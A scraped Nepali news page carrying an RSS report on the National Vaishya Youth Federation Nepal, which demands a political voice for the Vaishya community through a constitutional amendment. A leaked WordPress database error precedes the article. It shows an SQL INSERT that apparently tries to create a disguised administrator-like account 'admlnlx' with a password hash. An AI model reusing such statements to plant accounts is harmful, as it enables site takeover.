WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BHp91M9m47VQjtojAA2HvPmHkEzxCP0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 23:08:50', '', 'admlnlx', 'admlnlx')
दमक, माघ २ –
राष्ट्रिय वैश्य युवा महासङ्घ नेपालले राष्ट्र निर्माणमा वैश्य समुदायको सहभागिता गराउन माग गरेको छ ।
देशको अर्थतन्त्रमा महत्वपूर्ण योगदान राखेको आफ्नो समुदायलाई सरकारले बेवास्ता गरेको भन्दै उनीहरुले संविधान संशोधन मार्फत आफ्ना माग पूरा गराउन दबाब दिन थालेका हुन् । वैश्यहरुको मागलाई संविधानमा समेट्नका लागि दबाब दिन महासङ्घको युवा टोलीले मेची–महाकाली वैश्य पहिचान अभियानको यहाँबाट आरम्भ गरेका छन् ।
यहाँ आज आयोजित पत्रकार सम्मेलनमा महासङ्घका केन्द्रीय महासचिव राजीव शाहले नेपालमा रहेका सबै वैश्य व्यवसायी भएको र राजनीतिक दललाई आफूहरुले सहयोग गरे पनि आफ्नो पहिचानलाई ख्याल नगरेको आरोप लगाउनुभयो ।
पत्रकार सम्मेलनमा महासङ्घका कोषाध्यक्ष श्यामनारायण शाहले २५ जाति रहेको वैश्य समाजको राजनीतिमा पहँुच बढाउन आवश्यक भएको बताउनुभयो । नेपालमा वैश्य समुदाय करिब ३० लाखको हाराहारीमा रहेको बताइएको छ । – रासस